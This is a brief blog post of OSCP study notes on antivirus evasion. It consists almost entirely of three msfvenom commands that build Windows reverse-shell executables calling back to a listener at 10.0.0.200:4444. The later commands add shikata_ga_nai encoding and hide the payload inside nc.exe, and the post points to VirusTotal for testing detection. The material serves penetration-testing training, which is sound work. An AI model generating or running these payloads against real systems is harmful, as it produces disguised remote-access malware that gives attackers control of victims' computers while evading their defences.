OSCP Learning Notes - Exploit(6)

Antivirus Bypassing

Tools: Kali Linux

Detection Platform: https://www.virustotal.com/gui/home/upload

1.

msfvenom -p windows/shell_reverse_tcp LHOST=10.0.0.200 LPORT=4444 -f exe -o shell1.exe

2.

msfvenom -p windows/shell_reverse_tcp LHOST=10.0.0.200 LPORT=4444 -f exe -e x86/shikata_ga_nai -o shell2.exe

3.

msfvenom -p windows/shell_reverse_tcp LHOST=10.0.0.200 LPORT=4444 -f exe -e x86/shikata_ga_nai -x /usr/share/windows-binaries/nc.exe -o shell3.exe

 

posted @ 2019-07-16 22:14  晨风_Eric  阅读(189)  评论(0编辑  收藏  举报